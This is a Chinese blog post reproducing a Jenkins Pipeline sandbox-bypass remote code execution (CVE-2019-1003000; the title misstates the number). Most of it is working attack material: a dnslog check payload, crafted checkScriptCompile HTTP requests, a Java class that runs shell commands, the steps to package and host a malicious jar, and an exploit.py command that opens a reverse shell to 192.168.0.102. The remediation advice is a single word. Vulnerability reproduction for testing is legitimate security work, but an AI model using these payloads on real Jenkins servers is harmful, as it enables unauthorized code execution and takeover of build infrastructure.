[漏洞复现] jenkins 远程代码执行 (CVE-2019-100300)

最新推荐文章于 2024-05-17 02:50:54 发布
最新推荐文章于 2024-05-17 02:50:54 发布
阅读量2k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: jenkins 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/128021581
版权

文章目录

一、简介

拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。

Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。Pipeline使开发者可以方便的去撰写一些构建脚本以完成自动化的编译、测试、发布,其中文名称是流水线(工作流),帮助开发者精心地组织一个可以长期运行在多个节点上的任务。

为了检查使用者撰写的Pipeline Script有没有语法上的错误,Jenkins提供了一个界面给使用者检查自己的Pipeline脚本。通过将抽象语法树(AST,Abstract Syntax Tree)转换注释(如@Grab)应用于源代码单元,可以在脚本编译阶段绕过脚本安全沙箱保护,导致具有Overall/Read权限或能控制SCM中jenkinsfile或沙盒Pipeline共享库内容的用户绕过沙盒保护,并在Jenkins服务器上执行任意代码。

利用转换注释@Grab、@GrabResolover可以写入恶意的Jar文件到jenkins服务器,由于Pipeline是基于Groovy语法的,因此Jenkins使用了GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,最终导致在编译阶段执行了写入到Jenkins服务器的恶意Jar文件。

二、影响版本

Pipeline: Declarative 插件 <= 1.3.4
Pipeline: Groovy 插 件 <= 2.61
Script Security 插 件 <= 1.49

三、复现

工具
vulfocus没有提供账号密码,所以以下是在看别人复现的思路

登录之后,创建一个job

执行下面的语句利用

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "whoami"

反弹shell:

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/192.168.0.102/12345 0>&1"

不使用工具
验证是否存在漏洞,利用dnslog,看目标是否请求了该地址
payload

@GrabConfig(disableChecksums=true)

@GrabResolver(name='test', root='http://9mdvs1.dnslog.cn')

@Grab(group='test.sec', module='test', version='1')

import Payload;

请求包

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27test%27,%20root=%27http://kv0bn5.dnslog.cn%27)%0A@Grab(group=%27test.sec%27,%20module=%27test%27,%20version=%271%27)%0Aimport%20Payload; HTTP/1.1

Host: host

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

查看dnslog记录:
在这里插入图片描述
利用该漏洞命令执行
1.创建一个java文件,保存为jkrce.java代码如下:

public class jkrce {

  public jkrce() {

    try {

     String payload = "touch /tmp/test11111";

     String[] cmds = { "/bin/bash", "-c", payload };

     java.lang.Runtime.getRuntime().exec(cmds);

    } catch (Exception e) {

} 

}

}

2.创建文件夹META-INF/serverices/,编译并写jkrce类到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下:

javac jkrce.java 

mkdir -p META-INF/services/   

echo jkrce > META-INF/services/org.codehaus.groovy.plugins.Runners 

jar cvf jenkins-1.jar ./

3.在公网web服务器目录里,创建路径/tools/jenkins/1/ 这个路径要与下一步中的路径一致,并将上一步生成的jar文件放到该目录下

mkdir /tools/jenkins/1/

4.发送请求,数据包如下,xxx.xxx.xxx.xxx替换成公网地址即可:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27payload%27,root=%27http://xxx.xxx.xxx.xxx/%27)%0a@Grab(group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport%20jkrce; HTTP/1.1

Host: host

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

在这里插入图片描述

四、修复

更新

空白行
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1901
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
Jenkins RCE CVE-2019-1003000 漏洞复现
weixin_34102807的博客
02-21 1300
0x00 简述 拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码CVE-2019-1003000 (Script Security)CVE-2019-1003001 (Pipeline: Groovy)CVE-2019-1003002 (Pipeline: Declarative) 0x01 受影响的版本 Pipeline: Declarative Plu...
Jenkins未授权访问漏洞&amp;命令执行
最新发布
2401_85014013的博客
05-17 428
进入Script Console之后是一个执行脚本的页面查询当前用户查看IP配置信息。
jenkins rec cve-2019-1003000 复现
whatday的专栏
07-19 1294
0X1 漏洞预警 2019年1月8日,Jenkins官方发布了一则Script Security and Pipeline 插件远程代码执行漏洞的安全公告,漏洞CVE编号为:CVE-2019-1003000,官方定级为高危。2019年2月15日,网上公布了该漏洞的利用方式,该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed Pipeline共享库内容的用户绕过沙盒保护并在Jenkins主服务器上执行任意代码Jenkins是一个开源软件
CVE-2019-1003000:[Jenkins]Script Security Plugin沙箱绕过
公众号shadow sock7
05-09 942
先访问 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile 不带value, 跟进 workflow-cps.jar!\org\jenkinsci\plugins\workflow\cps\CpsFlowDefinition$DescriptorImpl#doCheckScriptCompile(@QueryParameter S
为什么要使用Docker
weixin_43771403的博客
11-17 403
一、环境配置的难题 软件开发最大的麻烦事之一,就是环境配置。用户计算机的环境都不相同,你怎么知道自家的软件,能在那些机器跑起来? 用户必须保证两件事:操作系统的设置,各种库和组件的安装。只有它们都正确,软件才能运行。举例来说,安装一个 Python 应用,计算机必须有 Python 引擎,还必须有各种依赖,可能还要配置环境变量。 如果某些老旧的模块与当前环境不兼容,那就麻烦了。开发者常常会说:“它在我的机器可以跑了”(It works on my machine),言下之意就是,其他机器很可能跑不了。 环境
jenkins 增量发布插件_文末附操作实践 | Jenkins远程代码执行漏洞CVE-2019-1003000)复现...
weixin_39774219的博客
12-09 196
t-img合天智汇安全预警2019年1月8日,Jenkins官方发布了一则ScriptSecurity and Pipeline插件远程代码执行漏洞的安全公告,漏洞CVE编号为:CVE-2019-1003000,官方定级为高危。2019年2月15日,网上公布了该漏洞的利用方式,该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxedPip...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码,即所谓的预认证远程代码执行(PreAuth RCE)。这个漏洞的影响非常严重,因为它无需任何登录凭据即可利用。 漏洞复现...
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github....fpizdamale@Pentest ~/go lsbin ...
[高危] Jenkins CLI 任意文件读取漏洞导致远程代码执行风险
weixin_43564241的博客
01-26 1084
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等。Jenkins 2.442, LTS 2.426.3 版本通过禁用命令解析器读取 @ 字符后文件路径的特性修复此漏洞
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4494
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861)
七天
11-25 4456
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
04-12 495
代码漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
cve-2019-9766引出的缓冲区漏洞学习
zwish的信安之路
06-25 1543
通过工程实践引出的缓冲区溢出,缓冲区溢出 缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。 1、栈的结构 1、先进后出。 2、在内存中表现为从高地址往低地址增长。 3、栈顶:栈的最上方(低地址区)。 4、栈低:栈的最下方(高地址区)。 基本的进程地址空间分布: 2、基本栈溢出: 缓冲区溢出示意图: 如果在数据段(右边的data)就保存了一系列的指令的二进制代码...
Jenkins远程命令执行漏洞CVE-2018-1000861)
网络安全。
05-23 3160
漏洞复现 1、查看目标版本。 curl -s -I http://xxx:8080| grep X-Jenkins 2、利用工具。 https://github.com/orangetw/awesome-jenkins-rce-2019 usage: python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’ 3、成功接收dnslog。 ...
Jenkins远程命令执行漏洞(CVE-2018-1000861)
锋刃科技的博客
06-06 5555
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
攻击者可以利用该漏洞Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值